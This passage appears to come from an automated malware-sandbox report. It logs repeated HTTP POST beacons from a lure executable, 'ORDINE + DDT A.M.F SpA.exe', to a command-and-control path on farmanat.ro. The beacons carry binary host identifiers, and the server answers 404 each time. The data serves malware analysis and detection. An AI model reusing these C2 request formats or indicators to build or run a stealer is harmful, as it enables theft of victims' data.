                                              Nov 25, 2021 10:51:32.155625105 CET6873OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:32.205734968 CET6873INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              397192.168.11.2050241176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:32.627207994 CET6874OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:32.660856009 CET6874OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:32.710422993 CET6875INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              398192.168.11.2050242176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:33.085055113 CET6875OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:33.118539095 CET6876OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:33.170150995 CET6876INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              399192.168.11.2050243176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:33.603281021 CET6877OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:33.637440920 CET6877OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:33.694824934 CET6877INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.11.2049823176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:02.549129009 CET6304OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:02.583339930 CET6305OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:02.669756889 CET6305INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              40192.168.11.2049876176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:27.693461895 CET6366OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:27.727015018 CET6366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:27.784121037 CET6366INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              400192.168.11.2050244176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:34.090456963 CET6878OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:34.124661922 CET6878OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:34.177088976 CET6879INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              401192.168.11.2050245176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:34.587918043 CET6879OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:34.622495890 CET6880OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:34.672346115 CET6880INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              402192.168.11.2050246176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:35.114156961 CET6881OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:35.148386955 CET6881OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:35.200263977 CET6881INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              403192.168.11.2050247176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:35.578963995 CET6882OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:35.612226963 CET6882OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:35.660902023 CET6883INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              404192.168.11.2050248176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:36.082510948 CET6883OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:36.116099119 CET6884OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:36.165667057 CET6884INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              405192.168.11.2050249176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:36.600595951 CET6885OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:36.634820938 CET6885OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:36.691555977 CET6885INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              406192.168.11.2050250176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:37.097490072 CET6886OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:37.131242990 CET6886OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:37.189821959 CET6887INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              407192.168.11.2050251176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:37.589318037 CET6887OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:37.623034954 CET6888OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:37.680969954 CET6888INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              408192.168.11.2050252176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:38.094882011 CET6889OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:38.128961086 CET6889OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:38.205209970 CET6889INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              409192.168.11.2050253176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:38.599425077 CET6890OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:38.632685900 CET6890OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:38.689625978 CET6891INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              41192.168.11.2049877176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:28.273850918 CET6367OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:28.308095932 CET6367OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:28.358525038 CET6368INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              410192.168.11.2050254176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:39.110251904 CET6891OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:39.143500090 CET6892OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:39.201595068 CET6892INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              411192.168.11.2050255176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:39.626538992 CET6893OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:39.660751104 CET6893OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:39.712763071 CET6893INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              412192.168.11.2050256176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
